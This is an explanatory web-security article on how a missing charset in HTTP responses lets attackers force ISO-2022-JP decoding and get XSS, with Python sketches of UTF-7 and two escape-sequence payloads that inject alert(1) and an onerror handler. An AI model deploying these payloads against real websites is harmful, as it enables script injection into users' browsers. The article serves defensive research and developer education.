The charset attribute and the importance of using it

What assumptions can be made about the following HTTP response from the server?

Looking at this small fragment of the HTTP response, one can assume that the web application probably contains an XSS vulnerability.

Why is this possible? What stands out in this server response?

You'd be right to be suspicious of the Content-Type header. It has a subtle flaw: the charset attribute is missing. This may seem unimportant, but in this article we will explain how attackers can exploit this flaw to inject arbitrary JavaScript code into a website by deliberately changing the character set the browser expects.

Character encoding

A typical Content-Type header in an HTTP response looks like this:

    Content-Type: text/html; charset=utf-8

The charset attribute tells the browser that UTF-8 was used to encode the HTTP response body. A character encoding such as UTF-8 defines a mapping between characters and bytes. When a web server serves an HTML document, it maps the characters in the document to the corresponding bytes and sends them in the body of the HTTP response; this process converts (encodes) characters into bytes.

When the browser receives these bytes in the body of an HTTP response, it can convert them back (decode) into the characters of the HTML document.
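For illustration, a minimal Python sketch of both directions (the example markup is arbitrary and not taken from the article):

    # Encoding: the server turns the characters of the document into bytes.
    text = "<p>café</p>"
    body = text.encode("utf-8")
    print(body)                  # b'<p>caf\xc3\xa9</p>'

    # Decoding: the browser turns those bytes back into the same characters,
    # provided it uses the same character encoding.
    print(body.decode("utf-8"))  # <p>café</p>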

UTF-8 is one of the many character encodings that modern browsers are required to support according to the HTML specification. There are many others, such as UTF-16, ISO-8859-xx, windows-125x, GBK, Big5, and so on. Knowing which encoding the server used is critical for the browser, because without it, it cannot correctly decode the bytes in the HTTP response body.

But what happens if the charset attribute is not specified in the Content-Type header or is specified incorrectly?

In this case, the browser will look for a <meta> tag in the HTML document itself. This tag may also carry a charset attribute that specifies the character encoding (for example, <meta charset="utf-8">). Note the chicken-and-egg problem this creates for the browser: to find this tag, it must first decode the HTTP response body. So the browser has to guess an encoding for the body, decode it, look for the <meta> tag, and possibly re-decode the bytes with the character encoding that the tag specifies.

Another, less common way to specify the character encoding is the Byte Order Mark (BOM). This is a special Unicode character (U+FEFF) that can be placed at the start of a document to indicate the byte order and, with it, the character encoding. It is primarily used in files, but since such files may be served by a web server, modern browsers support this method as well. A byte order mark at the beginning of an HTML document even takes precedence over the charset attribute in the Content-Type header and the <meta> tag.

To summarize, there are three common ways for a browser to determine the character encoding of an HTML document, ordered by priority (a sketch of this resolution order follows the list):

  1. Byte order mark at the beginning of the HTML document,

  2. charset attribute in the Content-Type header,

  3. <meta> tag in the HTML document.
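A minimal sketch of this resolution order in Python, assuming a strongly simplified model of the WHATWG rules (real browsers pre-scan only a limited prefix of the body, handle many more syntactic variants, and fall back to locale-dependent defaults; the function and its regular expressions are illustrative only):

    import re
    from typing import Optional

    def sniff_encoding(body: bytes, content_type: Optional[str]) -> Optional[str]:
        """Guess the encoding a browser would pick for an HTML response."""
        # 1. A byte order mark takes precedence over everything else.
        if body.startswith(b"\xef\xbb\xbf"):
            return "utf-8"
        if body.startswith(b"\xff\xfe"):
            return "utf-16-le"
        if body.startswith(b"\xfe\xff"):
            return "utf-16-be"
        # 2. The charset attribute of the Content-Type header.
        if content_type:
            m = re.search(r"charset=([\w-]+)", content_type, re.I)
            if m:
                return m.group(1).lower()
        # 3. A <meta charset=...> tag, found by pre-scanning the still-undecoded
        #    bytes (browsers only look at roughly the first kilobyte).
        m = re.search(rb'<meta[^>]+charset="?([\w-]+)', body[:1024], re.I)
        if m:
            return m.group(1).decode("ascii").lower()
        # Otherwise: no information, so auto-detection or defaults kick in.
        return None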

No encoding information

The byte order mark is rarely used in practice, and the charset attribute is not always present in the Content-Type header or may be specified incorrectly. Also, especially for partial HTML responses from the server, the <meta> tag indicating the character encoding is usually missing. In these cases, the browser has no information about which character set to use.

Have you ever seen a browser display an error message in this situation? Probably not, because no such error exists.

As with invalid HTML syntax, browsers try to make the best of the content received from the web server and reconstruct the missing character set information themselves. This lenient behavior makes for a good user experience, but it also opens the door to exploitation techniques such as mXSS.

In the absence of any character encoding information, browsers try to guess the encoding from the content itself, which is called auto-detection. This is similar to MIME type sniffing, but operates at the character encoding level. For example, Chromium's Blink rendering engine uses the Compact Encoding Detection (CED) library for automatic character encoding detection. As we will see later, this auto-detection is a very powerful tool from an attacker's perspective.
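A rough illustration of content-based detection, using the third-party chardet package rather than the CED library that Blink actually uses (an assumption made purely for demonstration):

    import chardet  # pip install chardet

    # A body with no charset information, but containing ISO-2022-JP escape
    # sequences (ESC $ B ... ESC ( B) around two Japanese bytes:
    body = b'Hello \x1b$B0l\x1b(B world'
    print(chardet.detect(body))
    # A single escape sequence is usually enough for the detector to report
    # ISO-2022-JP for the whole body, e.g. {'encoding': 'ISO-2022-JP', ...}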

At this point, we've become familiar with the various mechanisms that browsers use to determine the character encoding of HTML documents. But how can attackers exploit this?

Differences in encodings

The purpose of a character encoding is to convert characters into a sequence of bytes that a computer can process. These bytes are transmitted over the network and decoded back into characters by the receiver, which restores the same characters that the sender intended to transmit.

This only works well if the sender and receiver have agreed on how the characters are encoded. If there is a mismatch between the character encoding used for encoding and the one used for decoding, the recipient may see different characters:
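A small Python illustration of such a mismatch (mojibake):

    body = "café".encode("utf-8")
    print(body.decode("utf-8"))        # café   (sender and receiver agree)
    print(body.decode("iso-8859-1"))   # cafÃ©  (receiver guessed wrong)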

This mismatch between the character encoding used for encoding and the one used for decoding is what we refer to as an encoding difference in this article.

For web applications, it is vital that user-controlled data is sanitized to prevent Cross-Site Scripting (XSS) vulnerabilities. If the character encoding used by the browser differs from the one the web server assumed while sanitizing, this can break the sanitization and lead to XSS.

This in itself is not big news; even Google faced a similar problem back in 2005. Google's 404 page did not provide any character encoding information, which could be exploited by supplying an XSS payload in the UTF-7 encoding. In UTF-7, special HTML characters such as angle brackets are encoded differently than in ASCII, which can be used to bypass sanitization:
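The direction that matters for an attack is decoding: bytes that contain no literal angle brackets can still decode to them. A small Python illustration (the payload string is a generic example, not Google's original one):

    # In UTF-7, '<' and '>' can be written as the runs +ADw- and +AD4-,
    # so a filter that looks for literal angle brackets finds nothing:
    payload = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
    print(payload.decode("utf-7"))     # <script>alert(1)</script>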

This clearly demonstrated the dangers of this encoding, and UTF-7 was deprecated in later years to prevent such security problems. The HTML specification now explicitly prohibits the use of UTF-7, precisely to prevent XSS vulnerabilities.

There are many other supported character encodings, but most of them are useless from an attacker's point of view. All special HTML characters, such as angle brackets and quotation marks, live in the ASCII range, and since most character encodings are ASCII-compatible, there is no exploitable encoding difference for these characters. Even UTF-16, which is not ASCII-compatible because it uses two bytes per character, is usually not exploitable: the byte representation of ASCII characters stays the same, just with an additional null byte after it (little-endian) or before it (big-endian).
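A quick Python illustration of why UTF-16 is of little use here:

    # The special HTML characters keep their byte value in UTF-16; they only
    # gain a null byte, so no new characters appear for the parser:
    print("<".encode("utf-16-le"))   # b'<\x00'
    print("<".encode("utf-16-be"))   # b'\x00<'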

However, there is a particularly interesting encoding: ISO-2022-JP.

ISO-2022-JP

ISO-2022-JP is a Japanese character encoding defined in RFC 1468. It is one of the character encodings that user agents (browsers) must support according to the HTML standard. What makes this encoding especially interesting is that it supports escape sequences for switching between different character sets.

For example, if a byte stream contains the bytes 0x1b, 0x28, 0x42, these bytes are not decoded into a character; instead, they indicate that all following bytes should be decoded as ASCII. In total there are four different escape sequences for switching between character sets: ASCII, JIS X 0201 1976, JIS X 0208 1978, and JIS X 0208 1983.
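A small sketch of these mode switches using CPython's built-in iso2022_jp codec (the byte values of the four escape sequences are those defined in RFC 1468; the sample string is arbitrary):

    # The four designation escape sequences of ISO-2022-JP (RFC 1468):
    TO_ASCII          = b"\x1b\x28\x42"   # ESC ( B
    TO_JIS_X_0201_76  = b"\x1b\x28\x4a"   # ESC ( J  (JIS X 0201-1976 "Roman")
    TO_JIS_X_0208_78  = b"\x1b\x24\x40"   # ESC $ @  (JIS X 0208-1978)
    TO_JIS_X_0208_83  = b"\x1b\x24\x42"   # ESC $ B  (JIS X 0208-1983)

    # Encoding a Japanese character shows the encoder switching into a
    # two-byte mode and back to ASCII within one string:
    encoded = "aあz".encode("iso2022_jp")
    print(encoded)                        # typically b'a\x1b$B$"\x1b(Bz'
    print(encoded.decode("iso2022_jp"))   # aあz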


This feature of ISO-2022-JP not only provides flexibility, it can also break fundamental assumptions. At the time of writing, Chrome (Blink) and Firefox (Gecko) automatically detect this encoding: the appearance of one of these escape sequences is usually enough for the auto-detection algorithm to treat the entire HTTP response body as ISO-2022-JP.

The following sections describe two different exploitation techniques that attackers can use once they manage to force the browser to use the ISO-2022-JP encoding. Depending on the attacker's capabilities, this can be achieved, for example, by directly manipulating the charset attribute in the Content-Type header or by inserting a <meta> tag via an HTML injection vulnerability. If the web server sends an invalid charset attribute or none at all, usually no additional prerequisites are needed, since attackers can switch the encoding to ISO-2022-JP simply by triggering automatic encoding detection.

Method 1: Neutralizing Backslash Escaping

The prerequisite for this method is that user-controlled data is placed inside a JavaScript string.

Let's imagine a website that accepts two query parameters, search and lang. The first parameter is rendered in a normal text context, and the second (lang) is inserted into a JavaScript string.

Special HTML characters in the search parameter are HTML-encoded, and the lang parameter is sanitized by escaping double quotes (") and backslashes (\) with a backslash. This prevents breaking out of the string context and injecting JavaScript code:
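A minimal sketch of such a server-side template in Python (the page layout and parameter handling are hypothetical; they merely mirror the behaviour described above):

    import html

    def render_page(search: str, lang: str) -> bytes:
        # HTML-encode the "search" value, backslash-escape the "lang" value.
        search_safe = html.escape(search)
        lang_safe = lang.replace("\\", "\\\\").replace('"', '\\"')
        page = (
            "<p>You searched for: " + search_safe + "</p> "
            '<script>var lang = "' + lang_safe + '";</script>'
        )
        # The document is sent as bytes, without any charset information.
        return page.encode("utf-8")

Note that html.escape() only rewrites characters such as angle brackets, ampersands and quotes; the ESC byte (0x1b) passes through untouched, so an escape sequence injected via the search parameter survives this sanitization.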

The default mode of ISO-2022-JP is ASCII. This means that all bytes received in the HTTP response body are decoded as ASCII, and the resulting HTML document looks exactly as expected.

Now let's imagine that an attacker injects into the search parameter the escape sequence that switches to the JIS X 0201 1976 mode (bytes 0x1b, 0x28, 0x4a).

As we can see, the result contains all the same characters as before, since JIS X 0201 1976 is mostly compatible with ASCII. However, a careful look at its code table reveals two exceptions:

The byte 0x5c is decoded as the yen sign (¥) and the byte 0x7e as the overline character (‾). This differs from ASCII, where 0x5c is the backslash (\) and 0x7e is the tilde (~).
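This can be reproduced with CPython's built-in iso2022_jp codec, which should follow the same mapping:

    # After ESC ( J the decoder is in JIS X 0201 "Roman" mode, where 0x5c and
    # 0x7e no longer mean backslash and tilde:
    print(b"\x1b(J\x5c\x7e".decode("iso2022_jp"))   # expected: ¥‾
    print(b"\x1b(B\x5c\x7e".decode("iso2022_jp"))   # expected: \~  (ASCII mode)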

This means that when the web server escapes a double quote in the lang parameter with a backslash, the browser no longer sees a backslash but a yen sign.

Accordingly, the injected double quote effectively terminates the string and allows the attacker to inject arbitrary JavaScript code:
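Putting the pieces together, a sketch of what the browser ends up decoding (the injected lang value ";alert(1)// and the reflected escape sequence are hypothetical examples):

    # What the server believes it is sending: the search value reflected the
    # attacker's ESC ( J sequence, and the quote in lang was dutifully escaped
    # with a backslash (0x5c):
    body = (
        b'<p>You searched for: \x1b(J</p> '
        b'<script>var lang = "\\";alert(1)//";</script>'
    )
    # What the browser sees when it decodes the body as ISO-2022-JP: the
    # escaping backslash turns into a yen sign, so the following quote really
    # does terminate the string and alert(1) executes.
    print(body.decode("iso2022_jp"))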

While this method is quite effective, it is limited to bypassing sanitization in a JavaScript context, since the backslash has no special meaning in HTML. The next section explains a more advanced method that can be used in an HTML context.

Method 2: Breaking the HTML Context

The prerequisite for the second method is that an attacker can control values in two different HTML contexts. A typical example is a website that renders Markdown. For instance, consider the following Markdown text:

![blue](0.png) or ![red](1.png)

The resulting HTML code looks like this:

<img src="0.png" alt="blue"/> or <img src="1.png" alt="red"/>

The important thing here is that the attacker can manipulate values in two different HTML contexts. In this case, these are:

  • Attribute context (image description/source)

  • Normal text context (text surrounding images)

By default, ISO-2022-JP uses ASCII encoding mode and the browser sees the HTML document as expected:
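Decoding the benign document with Python's iso2022_jp codec confirms this (the bytes are the HTML fragment shown above):

    body = b'<img src="0.png" alt="blue"/> or <img src="1.png" alt="red"/>'
    # Pure ASCII bytes decode to the very same text in ISO-2022-JP's
    # default (ASCII) mode:
    print(body.decode("iso2022_jp"))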

Now suppose the attacker inserts the escape sequence that switches the encoding to JIS X 0208 1978 (bytes 0x1b, 0x24, 0x40) into the description of the first image.

This forces the browser to decode all subsequent bytes using the JIS X 0208 1978 encoding. That encoding uses a fixed width of two bytes per character and is not ASCII-compatible, which effectively destroys the structure of the HTML document.

However, a second escape sequence can be added in the text context between the two images to switch the encoding back to ASCII.

All the following bytes are then decoded as ASCII again.

However, when we examine the resulting HTML code, we can see that something has changed: the beginning of the second img tag is now part of the alt attribute value.

The reason is that the four bytes between the two escape sequences were decoded as JIS X 0208 1978 and merged into two-byte characters, absorbing the double quote that was supposed to close the attribute value:
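A sketch of this absorption in Python (the placement of the two escape sequences follows the description above; the exact replacement characters in the output depend on the codec implementation):

    # The attacker ends the first alt text with ESC $ @ and starts the text
    # between the images with ESC ( B:
    body = (
        b'<img src="0.png" alt="blue\x1b$@"/> \x1b(Bor '
        b'<img src="1.png" alt="red"/>'
    )
    print(body.decode("iso2022_jp", errors="replace"))
    # The four bytes between the escape sequences (quote, slash, '>', space)
    # are consumed as two-byte JIS X 0208 code points, so the quote that
    # should close alt="..." never reaches the HTML parser, and the second
    # <img ...> starts inside the first image's alt value.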

At this point, the src value of the second image is effectively no longer inside an attribute value. An attacker can therefore replace it with, for example, a JavaScript error handler:
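For completeness, a sketch of the final payload (the onerror value is a hypothetical example):

    # Same bytes as before, but the "source" of the second image now carries
    # an error handler instead of a file name:
    body = (
        b'<img src="0.png" alt="blue\x1b$@"/> \x1b(Bor '
        b'<img src="x onerror=alert(1)//" alt="red"/>'
    )
    print(body.decode("iso2022_jp", errors="replace"))
    # After decoding, the first alt value runs up to the next double quote,
    # and onerror=alert(1) lands in attribute position of the surviving
    # <img> tag rather than inside a quoted attribute value.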

Conclusion

In this article, we emphasized the importance of providing character encoding information when serving HTML documents. The lack of such information can lead to serious XSS vulnerabilities, because attackers may be able to change the character set the browser uses.

We've detailed how the browser determines the character set used to decode the HTTP response body, and explained two different methods attackers can use to inject arbitrary JavaScript code into a website using the ISO-2022-JP character encoding.

While we believe that not specifying the character encoding is a vulnerability in itself, the browser's automatic character encoding detection greatly increases its impact. We therefore hope that browsers will follow our proposal and disable the automatic detection mechanism, at least for the ISO-2022-JP character encoding.
